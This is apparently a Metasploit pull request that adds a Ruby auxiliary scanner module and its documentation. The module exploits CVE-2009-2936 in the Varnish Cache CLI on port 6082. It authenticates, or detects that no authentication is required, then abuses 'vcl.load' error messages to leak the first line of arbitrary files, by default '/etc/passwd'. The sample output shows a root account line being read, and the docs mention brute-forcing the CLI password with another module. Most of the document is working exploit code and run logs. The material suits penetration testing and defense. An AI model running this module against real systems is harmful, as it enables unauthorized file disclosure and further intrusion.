### PR TITLE
varnish file read

### DIFF
--- a/documentation/modules/auxiliary/scanner/varnish/varnish_cli_file_read.md
+++ b/documentation/modules/auxiliary/scanner/varnish/varnish_cli_file_read.md
@@ -1,0 +1,60 @@
+## Vulnerable Application
+
+  Ubuntu 14.04 can `apt-get install varnish`.  At the time of writing that installed varnish-3.0.5 revision 1a89b1f.
+  Kali installed varnish-5.0.0 revision 99d036f
+  
+  Varnish installed and ran the cli on localhost.  First lets kill the service: `sudo service varnish stop`.  Now, there are two configurations we want to test:
+
+  1. No Authentication: `varnishd -T 0.0.0.0:6082`
+  2. Authentication (based on shared secret file): `varnishd -T 0.0.0.0:6082 -S <file>`.
+    1. I made an easy test one `echo "secret" > ~/secret`
+
+## Verification Steps
+
+  Example steps in this format:
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use auxiliary/scanner/varnish/varnish_cli_file_read```
+  4. Do: ```set password <password>```
+  5. Do: ```run```
+  6. Get the first line of a file
+
+## Options
+
+  **PASSWORD**
+
+  String to use as the password.  May be bruteforced via `modules/auxiliary/scanner/varnish/varnish_cli_login`
+
+  **FILE**
+
+  File to attempt to read the first line of
+
+## Scenarios
+
+  Running against Ubuntu 14.04 with varnish-3.0.5 revision 1a89b1f and NO AUTHENTICATION
+
+  ```
+    resource (varnish_read.rc)> use auxiliary/scanner/varnish/varnish_cli_file_read
+    resource (varnish_read.rc)> set password secret
+    password => secret
+    resource (varnish_read.rc)> set rhosts 192.168.2.85
+    rhosts => 192.168.2.85
+    resource (varnish_read.rc)> set verbose true
+    verbose => true
+    resource (varnish_read.rc)> run
+    [+] 192.168.2.85:6082     - 192.168.2.85:6082 - LOGIN SUCCESSFUL: No Authentication Required
+    [+] 192.168.2.85:6082     - root:x:0:0:root:/root:/bin/bash
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```
+
+  Running against Ubuntu 14.04 with varnish-3.0.5 revision 1a89b1f
+
+  ```
+    msf auxiliary(varnish_cli_file_read) > run
+    
+    [+] 192.168.2.85:6082     - root:x:0:0:root:/root:/bin/bash
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```

--- a/modules/auxiliary/scanner/varnish/varnish_cli_file_read.rb
+++ b/modules/auxiliary/scanner/varnish/varnish_cli_file_read.rb
@@ -1,0 +1,72 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'metasploit/framework/tcp/client'
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::Tcp
+  #include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+  include Metasploit::Framework::Varnish::Client
+
+  def initialize
+    super(
+      'Name'           => 'Varnish Cache CLI File Read',
+      'Description'    => 'This module attempts to read the first line of a file by abusing the error message when
+                           compiling a file with vcl.load.',
+      'References'     =>
+        [
+          [ 'OSVDB', '67670' ],
+          [ 'CVE', '2009-2936' ],
+          [ 'EDB', '35581' ],
+          [ 'URL', 'https://www.varnish-cache.org/trac/wiki/CLI' ]
+        ],
+      'Author'         =>
+        [
+          'patrick', #original module
+          'h00die <mike@shorebreaksecurity.com>' #updates and standardizations
+        ],
+      'License'        => MSF_LICENSE
+    )
+
+    register_options(
+      [
+        Opt::RPORT(6082),
+        OptString.new('PASSWORD',  [ false, 'Password for CLI.  No auth will be automatically detected', '' ]),
+        OptString.new('FILE',  [ false, 'File to read the first line of', '/etc/passwd' ])
+      ], self.class)
+
+  end
+
+  def run_host(ip)
+    # first check if we even need auth
+    begin
+      connect
+      challenge = require_auth?
+      if !challenge
+        print_good "#{ip}:#{rport} - LOGIN SUCCESSFUL: No Authentication Required"
+      else
+        if not login(datastore['PASSWORD'])
+          vprint_error "#{ip}:#{rport} - Unable to Login"
+          return
+        end
+      end
+      # abuse vcl.load to load a varnish config file and save it to a random variable.  This will fail to give us the first line in debug message
+      sock.puts("vcl.load #{Rex::Text.rand_text_alphanumeric(3)} #{datastore['FILE']}")
+      result = sock.get_once
+      if result && result =~ /\('input' Line \d Pos \d+\)\n(.+)\n/
+        vprint_good($1)
+      else
+        vprint_error(result) # will say something like "Cannot open '/etc/shadow'"
+      end
+      close_session
+      disconnect
+    rescue Rex::ConnectionError, EOFError, Timeout::Error
+      print_error "#{ip}:#{rport} - Unable to connect"
+    end
+  end
+end


### PR DESCRIPTION
Requires #7652 for the library to be present.

Part of #7558 taking modules in EDB that were never imported.  This module implements the varnish cli file read (first line) portion of that code.

## Verification

List the steps needed to make sure this thing works

- [x] Install the application
- [x] Start msfconsole
- [x] Do: ```use auxiliary/scanner/varnish/varnish_cli_file_read```
- [x] Optionally: set a new password
- [x] Do: ```run```
- [x] Enjoy the first line of the file you tried to read in
- [x] Redo this with varnish set to no authentication.  Check the md docs.